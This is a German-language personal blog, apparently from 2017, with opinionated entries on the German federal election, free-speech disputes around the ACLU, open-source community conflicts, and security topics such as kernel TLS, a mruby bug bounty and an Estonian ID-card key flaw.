Update: Oh und meine Keynote lief glaube ich ganz gut. Falls jemand wissen will, worum es ging: Ich erkläre, was Externalisierung von Kosten ist (Umweltverschmutzung, Atommüll, Bankenskandal), dass das gemeinhin als unmoralisch und verwerflich gesehen wird, und stelle dann die These in den Raum, dass das Verbreiten von schlechter Software auch Externalisierung von Kosten ist. Dann erkläre ich, wie Security-Bugs auch Bugs sind, und erzähle die Anekdote, wie ich herausfand, dass Format String Bugs gefährlich sind, und in Panik meine Quellen durchging, ob ich das auch mal falsch gemacht habe. Hatte ich nicht. Weil das vor Bekanntwerden der Security-Implikationen auch schon ein Bug ist, und ich meinen Code sorgfältig geschrieben hatte. Security-Probleme sind also Pfusch, schlussfolgere ich an der Stelle.
Dann geht es mir um die Frage, wieso wir Pfusch dulden, und beobachte, dass das immer ökonomische Argumente sind. Als letzten Teil versuche ich, das ökonomische Argument für Pfusch zu demolieren. Erstens ist der Vergleich einer billigen Pfusch-Lösung mit einer ordentlichen, sicheren Lösung unlauter, weil nur die eine die Anforderungen erfüllt. Zweitens, so habe ich bisher beobachtet, kostet das gar nicht mehr, etwas ordentlich zu machen, weil einem das noch vor Produktlaunch auf die Füße fällt, wenn man bei auch nur einem der Module gepfuscht hat. Da würde ich echt gerne mal ein paar wissenschaftliche Untersuchungen zu sehen, inwieweit man das nachmessen kann. Vielleicht irre ich ja.
Update: Jahresumsatz, nicht -profit. Mach ich jedesmal falsch, weil es so ungeheuerlich ist :-)

Mon Sep 25 2017

[l] So, mal gucken, was jetzt passieren wird. Die CDU wird offensichtlich noch weiter in Richtung der braunen Ecke rücken. Härteres Durchgreifen gegen Ausländer, noch mehr "Terrorbekämpfung", noch mehr Polizeigewalt, noch mehr Überwachung, noch mehr verfassungsfeindliche Gesetze.
Die Grünen werden das selbstverständlich alles mittragen, denn Prinzipien haben die ja nicht. Vielleicht starten die Grünen noch einen schönen völkerrechtswidrigen Angriffskrieg oder zwei. Möglicherweise gibt es auch den Atom-Ausstieg-Ausstieg. Denn wenn jemand nicht aus der Atomkraft aussteigen will, dann die Grünen. Die haben ja sonst kein Thema mehr. Das SJW-Anbiedern hat jetzt jedenfalls ganz schnell ein Ende. Frauenquote? In einer Regierung mit der CDU? LOL nein.
Die SPD geht und nimmt ihre schlechten Minister mit, u.a. den Maas und die Schwesig. Da die CDU jetzt anscheinend verstanden hat, dass ohne Glasfaser auf dem Land ihre Kern-Wählerschaft wirtschaftlich am Ende sind, wird es vermutlich inhaltlich mehr um Ausbau als um Zensur gehen. Mal gucken. Der CDU sind Zensurbestrebungen ja auch nicht fremd. Vielleicht gehen sie das auch ohne die SPD in die Richtung.
Die Linken werden weiter keine Rolle spielen, obwohl sie im Parlament sitzen (warum ist das eigentlich so?!).
Die AfD wird den Pausenclown geben, und von den anderen Parteien wie Aussätzige boykottiert werden. Das wird teilweise popcornreife Szenen geben, wenn die SPD schnell anders stimmt, um nicht so zu stimmen wie die AfD. Wenn die AfD nicht völlig auf den Kopf gefallen ist, werden sie das gezielt ausnutzen.
An der Stelle sehr interessant ist übrigens diese Analyse, wer was gewählt hat. Da fallen zwei Erkenntnisse raus. Die AfD ist bei Arbeitern und im Osten besonders stark. Die FDP ist bei den Selbständigen und im Westen besonders stark. Die FDP ist sozusagen die AfD des Westens. Oder die AfD ist die FDP des Ostens.
Oh und für SJW ist das Wahlergebnis aus meiner Sicht ungefähr so kataklysmisch wie Trumps Sieg bei der Präsidentschaftswahl.
Detail am Rande: Frauke Petry will nicht in die AfD-Fraktion, Richtungsstreit mit Gauland. Ich glaube, dass Gauland der Stimmenfänger war. Damit hat die AfD deutlich gemacht, dass sie die braunste Nazisuppe ist, die man als Protestpartei wählen kann. Die Leute, die sowas wie die AfD aus inhaltlichen Gründen wählen (haha!), denen ist auch egal, ob Gauland oder Petry. Aber die Protestwähler hat Gauland rangeholt, nicht Petry.
Spannende Statistik am Rande: AfD-Hochburgen und Ausländeranteil im Vergleich.
Update: Besserer Link für Petry.

Tue Sep 12 2017

[l] Benutzt hier jemand Ruby? Also mruby genau genommen jetzt.
Der Typ, der mruby anbietet, hat gerade eine Bug-Lavine von biblischen Ausmaßen abgekriegt, nachdem eine Firma eine Bug Bounty für eine auf mruby basierende Webplattform gemacht hat. Die Firma dachte sich, sie legt man $20k zurück. Am Ende waren es eher so $500k, die sie auszahlen mussten.
Und der Maintainer sagt dazu was? Na klar!
Ruby is a complicated language which makes every Ruby implementation complex and likely to contain bugs. As a matter of fact I notice at least one of the bugs which was found in mruby to be also applicable to standard C Ruby (MRI). […] C sucks as a language to write stable code in a simple manner.
Ist halt schwierig! Und im Übrigen ist C Schuld! Nicht etwa ich, nein mein Herr! Ich bin hier das Opfer!1!! (Danke, Daniel)

Thu Sep 7 2017

[l] Estland hat eine Sicherheitsschwankung in ihrer Public-Key-Krypto.
In the light of current events, some Estonian politicians called to postpone the upcoming local elections, due to take place on 16 October. In Estonia, approximately 35% of the voters use digital identity to vote online.
Aber der Premierminister hat einen De-Maiziere gepullt.
Wenn ich das richtig sehe, war der Anbieter Gemalto. Der Einsender meint, dass man wohl aus dem Public Key den Private Key ableiten kann mit nur ein paar Versuchen, aber das steht so nicht in dem Artikel drin. Das gerüchtet man wohl gerade auf der Straße oder so. (Danke, Michael)
[l] Findet das eigentlich noch jemand bedenklich, dass selbst Russland (!) häufiger den Präsidenten wechselt als wir die Kanzlerin?
Ich meine, Russland, hier in der Presse immer als Autokratie und fast Diktatur beschimpft!
Oder wie wäre es mit der Türkei? Selbst Erdogan hat in der Mitte den Posten von Ministerpräsident zu Präsident gewechselt, damit das nicht so nach Monarchie aussieht!
Wer dieses Jahr Abi gemacht hat, hat seine gesamte Schulzeit über nie einen anderen Kanzler erlebt.

Tue Sep 5 2017

[l] Ihr werdet vielleicht gesehen haben, dass Linux 4.13 jetzt "TLS im Kernel" hat. Und die Hände über dem Kopf zusammengeschlagen haben. Denn auf den ersten Blick ist das eine ganz furchtbare Idee.
Jetzt muss man den Kernel updaten, wenn es mal wieder ein TLS-Update gibt!? Ein Bug im TLS-Code liefert jetzt Kernel-Privilegien?! Der Kernel macht X.509 und ASN.1?! Womit so ziemlich jeder andere auf die Fresse geflogen ist, der das probiert hat?!?
Daher dachte ich mir, ich gebe mal zu Protokoll, dass ich das für eine tolle Idee halte. Und zwar ist nicht das Handshake im Kernel (das ist der komplexe Teil am Anfang, der mit den ganzen Protokollunwägbarkeiten), sondern der Kernel übernimmt lediglich die Transportverschlüsselung, nachdem der Schlüssel ausgetauscht ist. Ein bisschen Einkapseln, symmetrische Krypto drüberlaufen lassen, fertig. Da kann man immer noch was falsch machen, klar, aber das ist, von der Angriffsoberfläche her, sowas wie 1% von TLS. Da mache ich mir wenig Sorgen.
Und auf der anderen Seite steht der Vorteil. Wenn man im Moment einen Client hat, der irgendwas verkackt, dann kann man da mit beim System beliegenden Tools wie strace die System Calls tracen lassen. Da steht dann sowas wie:
```
write(3,"GET /foo.txt HTTP/1.1\r\nHost: example.com:80\r\n\r\n",47)
```
Da kann man sehen, was der Client zu tun versucht hat. Und man kann die Antwort des Servers sehen. Wenn der Client TLS benutzt, dann sieht man bei strace nur noch die verschlüsselten Daten.
Wenn ich den Zugriff habe, den strace benötigt, kann ich natürlich auch die unverschlüsselten Daten abgreifen. Das ist also kein Schutz gegen jemanden mit diesem Level an Zugriff. Aber es macht Debugging und Tracing halt sehr schwierig. Mit TLS im Kernel würde man wieder den Klartext in read und write sehen.
ALLEINE DAFÜR ist das schon eine Sache, die ich haben will.
Es gibt noch einen weiteren Vorteil, der ist mir aber nicht so wichtig. Der Webserver kann dann wieder zero-copy TCP mit sendfile() machen. Das ist dann nicht wirklich zero copy, weil der Kernel ja verschlüsselt. Der kann also nicht einfach DMA aus dem Buffer Cache machen. Aber immerhin, eine Kopie weniger. Das war auch der Grund, wieso dieser Patch überhaupt gemacht wurde.
Und der andere Vorteil ist, dass man mit Debugging-Zugriff im System dann auch die Daten im Transit verändern kann. Das ist wichtig für Pentesting, aber auch für automatisiertes Testing kann das nützlich sein. Im Moment muss man dann einen Proxy aufsetzen und im System dessen Zertifikat als Trusted eintragen und so weiter.
Diese Eingriffe gehen wohlgemerkt auch jetzt schon alle mit Debugging-Rechten. Sie sind nur viel anstrengender umzusetzen.

Sat Aug 26 2017

[l] Trump begnadigt "Sherriff" Arpaio. Der Typ ist wegen Racial Profiling verurteilt worden. Überlegt euch mal, wie krass man es treiben muss als Sherriff, um wegen Racial Profiling nicht nur angeklagt sondern verurteilt zu werden. Mir ist kein anderer Fall bekannt.
Falls euch der Name nichts sagt: Wikipedia hat seine Karriere dokumentiert. Von der Dehumanisierung seiner Häftlinge her hätte der sich auch als KZ-Wärter gut gemacht.
[l] Wollt ihr auch mal eine positive Meldung über Regenwald und Umweltschutz hören?
Hier ist eine. So geht sie los:
In exchange for donating a portion of unspoiled, forested land to the Área de Conservación Guanacaste — a nature preserve in the country’s northwest — the park would allow the company to dump its discarded orange peels and pulp, free of charge, in a heavily grazed, largely deforested area nearby.
Die Firma hat es gemacht. Zehn Jahre ist da keiner hingegangen. Sie haben damals ein fettes Schild aufgestellt, damit sie den Ort wiederfinden. Dann ist jemand gucken gegangen und hat das Schild nicht gefunden, so dicht war da die Vegatation. Und die Vegatation war viel dichter und diverser auf dem Boden, wo die ihre Abfälle abgeladen hatten, als daneben.

Wed Aug 23 2017

[l] Was ich ja immer nicht verstehe, wenn freundliches Zusammenleben und Inklusivität so offensichtlich das gewinnende Modell ist, wieso leitet die Evolution dann nicht alle Projekte von ganz alleine dahin?
Irgendeinen Grund muss es doch geben, egal auf welcher Seite der Barrikaden man jetzt persönlich steht, dass die Projekte anscheinend alle von fiesen weißen Misogynisten und Schwulenhassern geleitet werden.
Meine Projekte sind bisher zu klein, als dass ich da eine Welle aus Troglodyten hätte, gegen die ich Schutzwälle aufbauen müsste, aber zu meinen Usenet-Zeiten erinnere ich mich noch gut an die Wagenburg-Mentalität, die sich von ganz alleine aufbaute, weil gefühlt immer und immer wieder immer neue Idioten reinkamen und ganz selbstverständlich die selbe Scheiße von sich gaben, die vorher schon hundert und tausend Mal widerlegt wurde. Kommt natürlich auf die Gruppe an. Ich rede jetzt von technischen Gruppen.
Auf Mailinglisten war das ähnlich. Ich erinnere mich da an bugtraq und linux-kernel, die ich mal eine Weile abonniert hatte. Das war nicht auszuhalten. Die eine Hälfte der Regulars haben dann halt die Idioten alle ins Killfile getan, aber das hilft nur gegen Idioten, die länger da bleiben, nicht gegen eine Flut von unfähigen Newbies und "bringt mir mal kurz Hacken bei"-Klappspaten. Aus dieser Erfahrung kann ich mir gut vorstellen, dass sich bei größeren Projekten entweder ein Gleichgewicht einstellt, weil die Umgebung eben so lange unfreundlicher und abstoßender wird, bis das Flutproblem weg geht. Oder das Projekt stirbt halt. Oder vielleicht stirbt auch nur die Mailingliste und der einsame Wolf popelt noch insgeheim an seinem Projekt weiter. Oder der einsame Wolf hat unendlich Kraft und Geduld und reibt sich sein Leben lang an seiner Umwelt auf. Ein Schicksal, dass man seinem übelsten Feind nicht wünschen würde.
Für mich als steinalter Regular fühlt sich jedenfalls diese neue Welle aus Inklusivitäts-Schneeflocken genau wie die alte Welle der AOL-Idioten an. Gut, die fordern inhaltlich was anderes, aber praktisch ist da kein Unterschied. Die halten sich 100% im Recht, die Frage stellt sich überhaupt nicht für die, ob sie sich möglicherweise gerade wie Arschlöcher verhalten. Sie kommen rein, stellen Forderungen, und wenn die nicht sofort beantwortet werden — für freie Software, wohlgemerkt, an der niemand was verdient! —, dann kommen sie mit Geld-Zurück-Mentalität und drohen damit, schlechte Bewertungen zu hinterlassen. DIE Art von Person. So "ihr habt euch jetzt gefälligst alle nach mir zu richten"-Leute, die in ihrem Leben noch keine Leistung erbracht haben, außer andere zu drangsalieren. So fühlte sich das damals bei AOL an. Und ich kann da gerade aus der Ferne keinen großen Unterschied erkennen, muss ich sagen. Wenn ihr Schneeflocken euch so sicher seid, dass ihr besser wisst, wie man das macht, dann macht doch mal ein eigenes Projekt. Nein, nicht jemand anderes Arbeit forken. Kommt erst mal dahin, dass ihr Code habt, den jemand forken könnte. Ich kenne kein einziges erwähnenswertes Projekt von solchen Leuten. Nicht eines. Ich kenne die immer nur als marodierende Barbaren, die in anderer Leute Projekten einfallen und alles kaputtmachen und am Ende noch den Code annektieren und abforken wollen, der aus freien Stücken und nobler Grundhaltung der Welt kostenlos zur Verfügung gestellt wurde. Ich habe jetzt eine Weile versucht, Mitgefühl zu entwickeln. Es will mir nicht gelingen.
Dabei ist es so einfach, sich in einem Projekt Respekt zu erarbeiten. Leiste einfach was. Erwarte nichts als Gegenleistung. Problem: Jede Minute über dich oder deine Leistungen reden macht 10 Minuten tatsächliche Leistung kaputt.
Das sind die Regeln.
Niemand schuldet euch die freie Software, und niemand schuldet euch Support für die freie Software, und euch mitmachen zu lassen schuldet euch auch niemand. Wer herkommt und Forderungen stellt, der hat sich sofort 100 Minuspunkte erarbeitet. Daraufhin kriegt der erst Recht keine Hilfe mehr und wird im Gefühl bestärkt, in einer feindlichen Umgebung zu sein.
Ist alles so einfach, und so berechenbar. Niemand verhält sich hier irrational. Idioten wird es immer geben. Sei einfach keiner von ihnen. Ganz einfach!
Der Rant hier kommt daher, dass ich die Tage einen Bug in umatrix filen wollte. Der Autor hat das Bugtracking-System zugemacht. Oben stand klar und deutlich drüber: Keine Bugs für Seiten melden, die man sich kaputtkonfiguriert hat. Und die Leute haben das gesehen und trotzdem lauter solche Bugs aufgemacht. Also hat der Autor das Bugtracking-System zugemacht und jetzt ist es für alle Scheiße. Und ich bin mir fast sicher, dass keiner von denen sich im Unrecht wähnt, oder auch nur verstanden hat, dass er das gerade für alle kaputt gemacht hat. Die legen sich selbst gegenüber das bestimmt genau so zurecht, wie die SJWs sich die Welt zurechtlegen.
Völlig unvermittelt und ohne Provokation hat der fiese weiße Projektmaintainer seine Privilegien über den Github-Account genutzt, um mich zu unterdrücken, indem er meine Bugs nicht mehr annimmt! Da sieht man mal wieder, dass das nichts wird mit alten weißen Männer, die ihre Privilegien nicht gecheckt haben!1!!
Update: Kris hat einen "Gegenrant" dazu gemacht. Über den hab ich mich inhaltlich so geärgert, dass ich ihm eine lange böse Mail geschickt habe :-)
Es geht direkt mit einem Strohmann los, "programmers are able to do anything just because they are able to do one thing". Ich hatte tatsächlich das genaue Gegenteil davon behauptet. Dann fand ich seine Übersetzung an einer Stelle doof, aber Schwamm drüber. Auffällig fand ich, dass die Situation, die er beschreibt, genau die ist, die ich auch beschrieben habe. Nur dass er sie sich schönredet. Ich habe auch auf Mailinglisten und in Newsgroups rumgehangen und sogar die FAQ erstellt und geupdated. Ich habe wie Kris pro Tag 60 Minuten oder so damit verbracht, die Postings durchzugehen und jeweils den Link auf den FAQ-Eintrag zu mailen. Natürlich haben wir den Leuten auch erklärt, dass hier alle unentgeltlich arbeiten, und dass das ein Community-Projekt ist, und sie herzlich zum Mitmachen eingeladen sind, und zwar nicht nur Patches sondern auch Dokumentation und Community Management. Jeder nach seiner Fasson.
Aber aus meiner Perspektive ist das ein Todesmarsch durch die Wüste der Verdammnis. Eine Stunde pro Tag, die dir niemand zurück gibt. Klar hatte ich damals auch ein paar "Jünger", die das gut fanden und mitgeholfen haben. Aber im Wesentlichen habe ich da wie Sisyphos einen großen Stein einen Berg hochgerollt, und kam nicht voran.
Kris schildet genau das selbe, aber fokussiert sich auf die positiven Aspekte. Aus meiner Sicht ist das eine enorme Leistung, sich so zu bullshitten, dass man dieses nie endende Jammertal jahrelang erdulden kann, und am Ende noch der Meinung ist, man habe etwas zum Besseren gewandelt. Ich bin Kris übrigens ewig dankbar für seine Arbeit in de.comp.lang.php, denn die ganzen PHP-"Entwickler", die er da nicht rausgeekelt hat, sondern mit seiner Inklusivität ins Boot geholt hat, die haben die Altlasten hinterlassen, mit deren Aufräumen ich heute mein Brot verdiene :-)
Aber mit meiner ursprünglichen Fragestellung hat sein PHP-Community-Zeug nichts zu tun, denn er hat da eine User Community gepflegt. Bei vim (dem Editor) haben wir relativ früh die Mailingliste gespalten, in "für Developer" und "für User". Das hat gut funktioniert, weil die User-Fragen nicht mehr die Developer vom Arbeiten abgehalten haben. Aber ob da jetzt ein Kris bei der User-Mailingliste mithilft oder nicht, das spielt für meine Fragestellung keine Rolle, weil meine Frage ist, was man von den Autoren einer freien Software erwarten kann.
Ich bleibe bei meiner Linie, dass man von Fragestellern ein Mindestmaß an Respekt erwarten kann. Und dazu gehört: Filed keine Bugs, die schon jemand anderes gefiled hat. Stellt keine Fragen, die in der FAQ beantwortet werden, oder die im Archiv der letzten Woche schon mal beantwortet wurden. Nervt nicht rum, wenn euch niemand hilft, sondern versteht, dass das alles Freiwillige sind und bietet daher lieber von euch aus Hilfe an, als von anderen Hilfe einzufordern.

Fri Aug 18 2017

[l] Den Wahl-O-Mat kennt ihr ja hoffentlich alle. Da kann man zu ein paar Fragen sagen, wie man steht, und der gleicht das dann mit den Wahlversprechen der Parteien ab und sagt einem, welche Partei am nächsten dran ist.
Der Nachteil davon ist, dass die Parteien sich in der Praxis nicht an Wahlversprechen gebunden fühlen. Müntefering hat das 2006 schön formuliert, falls sich an den überhaupt noch jemand erinnert von euch.
Müntefering bezeichnete es als "unfair", dass die Koalitionsparteien an ihren Versprechen im Wahlkampf gemessen würden.
Ja genau. Wo kommen wir da hin!
Nun, jedenfalls stellt sich ja schon die Frage, wie man denn sonst entscheiden soll, für wen man stimmt.
Hey, wie wäre es damit, nicht zu gucken, was die sagen, sondern was sie tun? Das ist die Idee hinter deinwal.de.
Allerdings möchte ich aus Fairnessgründen auch die Gegenposition verlinken. Und zwar hatte abgeordnetenwatch.de eine Aktion namens "Wahrplakat", bei der es darum ging, zu Abgeordneten Wahlplakate mit "der Wahrheit" zu produzieren, d.h. konkret damit, wie sie bei bestimmten Themen abgestimmt haben. Also im Grunde eine ähnliche Idee. Hier die Gegenposition dazu, von Halina Wawzyniak, einer Abgeordneten der Linkspartei. Sie sagt, dass Abgeordnetenarbeit aus viel mehr als Abstimmungen besteht, und dass man auch manchmal gegen ein Gesetz stimmt, das in die richtige Richtung geht, weil es nicht weit genug geht oder weil da als Seiteneffekt inakzeptable Dinge kaputtgemacht werden. Daher ist es nicht so einfach, dass man bloß auf Ja und Nein gucken kann bei Abstimmungen.
[l] Oh wow! Faszinierendes Zeitdokument: Die ACLU 1934 zu der Frage, ob man die Grundrechte von Nazis verteidigen solle. Also echte Nazis damals.
SOME of our members have sharply criticized the Union for championing the right of German-American Nazis to hold meetings and to conduct their propaganda.
Die ACLU argumentiert in dem Pamphlet dann, dass dieselben Leute kein Problem damit hätten, wenn sich Mussolini-Anhänger träfen, oder wenn die ACLU das Recht des KKK verteidigt, sich zu treffen.
Das war mir nicht bewusst, dass die ACLU den KKK verteidigt hat. Leider liegt das da als gescannte Bitmaps vor. ~~Vielleicht findet sich ja jemand, der das nach Text wandelt.~~ [Update: Oben gibt es einen Reiter dafür, "Text"] Einen Auszug und ein bisschen Kontext findet man auf dieser Libertarismus-Webseite, die ich mal zitieren will, weil das so bemerkenswert ist:
In being consistently libertarian the Liberties Union has never hesitated to take action involving its principles when that action was to the benefit of suppressive, intolerant, demagogic, and generally anti-libertarian elements. In 1934, for example, it sent its general counsel to aid the Friends of New Germany, a Nazi organization, in court proceedings to break down a lawless prohibition of their meeting in New Jersey.
This logical gesture was a shock to the howling enemies of the Union, who continually accuse it of being “pro-Communist” because so many of the men and women defended from illegal attacks are workers. It was even criticized by members who would except the German Fascists from their tolerance for the rather good reason that since the Nazis in Germany suppress all civil liberties, their agents should be permitted none in America. Moreover, there was the knowledge that free speech and assemblage would be denied us if these same German Nazis got control of local, city or state government anywhere in America.
Also GENAU DIE Argumente, die jetzt auch kommen. 1934.
Und hier ist, wie die ACLU damals argumentiert hat.
Some years ago, when the Ku Klux Klan was invading the north, Mayor Curley of Boston, a Catholic, denied this terroristic body the right to hold a meeting and have speeches, but here again the Union protested, not because it had any love for the sheeted and dangerous yokels, but because it knew that if the Mayor suppressed the Klan he would lawlessly stop others he disliked — birth control advocates, union organizers, pacifists, etc. “And,” continues the report, “he did. Our protest began when his lawless suppression began. We do not choose our clients. Lawless authorities denying their rights choose them for us.”
Aus heutiger Sicht ist lustig, dass die Linken damals als "radicals" bezeichnet wurden, und das anscheinend auch selbst auf sich angewendet haben. Heute nennen die sich ja eher "progressiv", was ja wohl mal die bekloppteste Bezeichnung aller Zeiten ist.
Hier ist jedenfalls, was die ACLU 1934 zu dem Nazi-Fall gesagt hat:
“Few of our critics,” replied the Union, “take a frankly class position on the exercise of free speech, as do the Communists — denying to reactionaries the rights they seek for themselves. Emotions of hate and intolerance alone lead them to outlaw the Nazis.
But if the Union yielded to such critics, and condoned the denial of rights to Nazi propagandists, in what position would it be to champion the rights of others? Shall we choose to defend only progressive or radical causes? And if we do, how best can we defend them? Is it not clear that free speech as a practical tactic, not only an abstract principle, demands defense of the rights of all who are attacked in order to obtain the rights of any?”
Und dann fragen sie ganz pointiert, ob daher nicht die beste Methode, die Rechte von Kommunisten zu schützen sei, die selben Rechte bei den Nazis zu schützen. Denn sonst hätte man, wenn das Rechtebeschneiden bei den Kommunisten ankommt, kein Standing mehr vor Gericht, wenn man das vorher bei den Nazis durchgehen ließ.
Und die ACLU hat sich das nicht einfach gemacht, denn:
It was on precisely such a basis that our attorneys, both Jews, urged on the Mayer of New York the use of city property for a meeting of the persecutors of Jews, the Nazis; and that our general counsel, Arthur Garfield Hays, a Jew, aided the attorney for the Friends of New Germany (Nazi) in court proceedings to break down a lawless prohibition of their meetings in New Jersey.
[…]
We do not choose our clients. Lawless authorities denying their rights choose them for us.
Und dann kommt ein Argument, das ich so gestern abend auch gebracht habe, aber besser formuliert:
To those who advocate suppressing propaganda they hate, we ask--where do you draw the line? They can answer only in the terms of revolutionists--at our political enemies. But experience shows that “political enemies” is a broad term, and has covered the breaking up even of working class meetings by rival working class organizations. It illustrates the danger, and the impracticality of making any distinctions in defending rights sought by all.
Und natürlich haben sie auch das Argument mit Rassismus und Verfolgung von Religionen gekriegt, und ihre Antwort darauf ist:
To those who would suppress meetings where race or religious hatred is likely to be stirred up, the answer is simple, — that there is no general agreement on what constitutes race or religious prejudice. Once the bars are so let down, the field is open for all-comers to charge such prejudice against any propagandists, — Communists, Socialists, atheists, — even against Jews attacking the Nazis.
So, und nachdem wir das alles gelesen haben, kommt heute die Zeitenwende bei der ACLU rein:
The American Civil Liberties Union will no longer defend hate groups seeking to march with firearms, the Wall Street Journal reported on Thursday, a policy change that comes on the heels of protests by white nationalists and counter-protesters at the weekend in Virginia.
Wow. Money Quote:
An ACLU spokeswoman confirmed the policy shift and said the concern over weapons was not something the group has had to contend with in the past.
"We’ve had people with odious views, all manner of bigots. But not people who want to carry weapons and are intent on committing violence," ACLU spokeswoman Stacy Sullivan said in a telephone interview.
Und das zieht mir hier gerade ganz schön die Schuhe aus. Woran macht man fest, dass die auf Gewalt aus waren? Dürfte nach der Definition nicht auch Präsident Trump keine Ralleys mehr machen?
Update: Besonders krass finde ich ja, dass der Dreh- und Angelpunkt die Schusswaffen sind. Da bin ich ja voll bei ihnen. Die ACLU hat aber auf der anderen Seite einen ewig langen Track Record, 2nd Amendment Rights zu verteidigen. Für mich ist die logische Schlussfolgerung, jetzt mal das 2nd Amendment zu überdenken. Aber das Fass will wieder niemand aufmachen. Warum eigentlich nicht?

Thu Aug 17 2017

[l] Habt ihr das Vice-Video geguckt, das ich verlinkt hatte?
Der Haupt-Interviewpartner von denen hat ein neues Video gemacht. Und zwar ist gegen ihn jetzt anscheinend ein Haftbefehl offen. Er steht heulend vor einer Mauer in dem Video und erzählt, dass sie die ganze Zeit alles richtig zu machen versucht haben. Sie haben ihren Scheiß ordentlich angemeldet, Monate vorher, die Stadt hat ihnen das dann kurzfristig abzusagen versucht, sie haben daraufhin die ACLU um Hilfe gebeten … JA! Wirklich! Die Nazis haben die ACLU um Hilfe gebeten! Und die ACLU hat mit ihnen zusammen geklagt und sie haben die Klage gewonnen und durften den Aufmarsch durchführen.
Und wisst ihr was? Ich bewundere an der Stelle die ACLU für ihre Prinzipien. Die verteidigen deine Grundrechte, egal ob du schwuler schwarzer Trans-Terrorist bist, oder ob du Nazi mit Hakenkreuz-Tattoo auf der Brust bist.
Ich bin von dieser Entwicklung nämlich auch zutiefst beunruhigt gerade. Grundrechte gelten für alle, sonst sind es keine Grundrechte. Meinungsfreiheit gilt gerade für die, die eine unpopuläre Meinung vertreten. Körperliche Unversehrtheit gilt gerade für die, die sich keinen Bunker, Bodyguard und Krankenversicherung leisten können. Das Recht auf faires Verfahren gilt gerade für Leute, die sich keinen Anwalt leisten können, und nicht lesen können, und daher die Dokumente nicht verstehen, die sie unterschreiben.
Wenn die Nazis Dinge tun, die verboten sind, dann ist das was anderes. In Deutschland kann ich damit leben, dass Hakenkreuz-Zeigen und Holocaust-Leugnen unter Strafe steht, auch wenn ich befürchte, dass das negative Nebenwirkungen hat. Aber wenn jemand eine Demo macht, in der er keine verbotenen Dinge tut, dann muss er das Recht haben, diese Demo durchzuführen. Ob den Anwohnern das passt oder nicht. Wer das nicht mag, kann eine Gegendemo machen.
Wir lagern gerade Gerechtigkeit von den Gerichten an privatwirtschaftliche Firmen aus. Klar darfst du deine Meinung frei äußern, aber Paypal lässt dich die Zugfahrkarte zum Zielort nicht kaufen, und dein Hoster macht die Webseite zu. Daily Stormer weine ich sicher keine Träne nach, aber rein von den Prinzipien her ist das hier eine ganz schlechte Richtung, in die wir uns bewegen.
Wenn euch das nicht beunruhigt, dann solltet ihr euch mal vor Augen führen, wegen was man heute als Nazi beschimpft wird. Wie weit, glaubt ihr, seid ihr persönlich davon entfernt, von so einem Shitstorm-Mob wegzensiert zu werden? Selbst wenn ihr euch selbst eher links verortet: Habt ihr noch nie gesehen, wie sich Linke gegenseitig als Nazi-Sympathisanten oder -Apologeten beschimpfen?
Update:
Subject: Du Nazifreund!
Das hat ja nicht lang gedauert.

Tue Aug 15 2017

[l] Zwei Chinesen haben am Reichstag in Berlin Selfies mit Hitlergruß gemacht — Festnahme. (Siehe auch)
[l] Eine der großen Fragen aus der Nazizeit ist für mich immer gewesen, ob ich es anders gemacht hätte. Hätte ich rechtzeitig erkannt, dass sich das gerade auf den Totalitarismus zubewegt? Rechtzeitig genug, dass man noch etwas hätte tun können?
Das Problem ist, dass ich den Vergleich nicht habe. Aber noch leben Zeitzeugen! Im Guardian äußert sich einer zu dieser Frage. Es wird euch nicht gefallen.
Update: Ein Einsender empfiehlt dazu dieses Interview mit Leo Szilard, einem Physiker und Zeitzeuge des 3. Reiches, der damals durch einige eindrucksvolle Vorhersagen aufgefallen ist.

Mon Aug 14 2017

[l] Wo haben die Nordkoreaner eigentlich so schnell ihre Raketen-Tech her?
Na von der Ukraine!
North Korea’s success in testing an intercontinental ballistic missile that appears able to reach the United States was made possible by black-market purchases of powerful rocket engines probably from a Ukrainian factory with historical ties to Russia’s missile program, according to an expert analysis being published Monday and classified assessments by American intelligence agencies.
Ach du meine Güte. Haben die Russen sich so viel Sorgen um Trumps Ausraster gemacht, dass sie seine nukleare Aufmerksamkeit ablenken wollten? Das ist ja mal krass. Oder auf der anderen Seite ist die Ukraine ja jetzt ein wichtiger Verbündeter der Amis, vielleicht waren das auch Teile des amerikanischen Establishments, vielleicht sogar Pro-Trump-Leute. Wie kriegen wir diesen Russland-Scheiß endlich weg? Ach komm, wir geben den Nordkoreanern Raketen-Tech, dann machen sich die Leute endlich über was anderes Sorgen! (Danke, Sabine)

Thu Aug 10 2017

[l] FaceApp zieht die "Rassenfilter" ihrer App zurück.
Rassenfilter? Da sieht man dann nur noch Weiße Männer online? Nein. Das ist ein Fotofilter. Man macht einen Selfie, und den gibt man der App, und die macht dann KI-Voodoo und spuckt ein Foto von einem in einer anderen Rasse aus. Die Ergebnisse sind sogar gar nicht so schlecht, finde ich.
Nun wäre meine erste Reaktion gewesen, dass das eine gute Möglichkeit sein könnte, um Empathie zu steigern. Den Leuten helfen, sich in andere reinzuversetzen. Da hasst es sich dann gleich gar nicht mehr so bequem, wenn man sich selbst in der Rolle gesehen hat.
Aber ob das bei den Rassisten von Rechts klappt, werden wir wohl nie erfahren, denn bei der PC-Polizei hat es nicht geklappt. Die hat da einen Blackface-Aufschrei gemacht und einen Shitstorm losgetreten und jetzt ist das weg.

Tue Aug 8 2017

[l] Oh geil, der Medien-Zirkelschluss ist komplett. Jetzt kommt die übliche Runde Medienschelte! The Atlantic zum Beispiel (wobei ich da gleich anmerken will, dass "Emotional Intelligence" ein Bullshit-Term ist, den sich Nicht-Psychologe aus dem Arsch gezogen hat, um sein Buch zu verkaufen).
Oder hier weist jemand darauf hin, dass die Gizmodo-Version die ganzen Beleg-Links weggemacht hat, und damit den Eindruck erweckte, dass das unsubstanziiertes Gelaber ist. Am Ende stand ein kurzer Abschnitt, dass sie Grafiken und Links rausgemacht haben. Ich hab den gesehen. Ihr auch?
Nun kann man das ja alles belustigt aus der Ferne beobachten und sich seinen Teil denken — oder man kann mal darüber nachdenken, was das für den Journalismus in allen anderen Disziplinen bedeutet, von dem wir ja unser Weltbild und unsere Meinungsbildung weitgehend abhängig machen, wenn die Journalisten schon nicht in der Lage sind, dieses Memo akkurat wiederzugeben. Das Memo, das ist vergleichsweise klarer, unmissverständlicher, neutraler Sprache geschrieben ist. Das bemüht wirkt, keine großen Worte zu verwenden, damit es verstanden wird. Wenn die DAS schon nicht können, wieso sollten wir denen eigentlich in beliebigen anderen Situationen vertrauen?
Ich finde das ein sehr gruseligen Fall, aus praktisch jedem Winkel, aus dem ich den betrachte. Wird immer schlimmer.

Sun Aug 6 2017

